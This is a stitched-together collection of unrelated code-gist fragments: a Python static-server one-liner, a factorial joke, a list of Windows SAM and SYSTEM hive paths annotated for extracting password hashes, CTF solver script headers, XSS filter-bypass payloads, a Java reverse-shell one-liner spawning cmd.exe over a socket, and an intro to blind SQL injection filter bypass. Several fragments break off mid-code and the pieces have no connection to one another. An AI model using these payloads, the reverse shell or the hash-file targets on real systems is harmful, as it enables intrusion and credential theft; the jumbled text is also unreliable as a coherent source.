Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
#Newbie programmer | |
def factorial(x): | |
if x == 0: | |
return 1 | |
else: | |
return x * factorial(x - 1) | |
print factorial(6) | |
#First year programmer, studied Pascal |
%SYSTEMDRIVE%\boot.ini | |
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\system | |
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
%WINDIR%\repair\sam | |
%WINDIR%\repair\system |
from __future__ import division | |
import hashlib | |
import requests | |
from datetime import datetime, timedelta | |
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}' | |
def totimestamp(dt, epoch=datetime(1970,1,1)): | |
td = dt - epoch | |
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6 |
# coding: utf-8 | |
""" | |
Unfortunately solved 20 minutes after the end of the CTF :( | |
""" | |
import re | |
import sys | |
import string | |
import requests |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
import socket | |
import time | |
from twisted.internet.protocol import Factory, Protocol | |
from twisted.internet import reactor | |
from twisted.names import dns | |
from twisted.names import client, server | |
from twisted.internet import defer | |
class MyResolver(client.Resolver): | |
def lookupAllRecords(self, name, timeout=None): |
String host="localhost"; | |
int port=8044; | |
String cmd="cmd.exe"; | |
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
There are several ways to bypass blind SQLi filters,
and today I will introduce MySQL blind sqli payload using an insert()
function.
Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.
This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...
) are blocked by the script.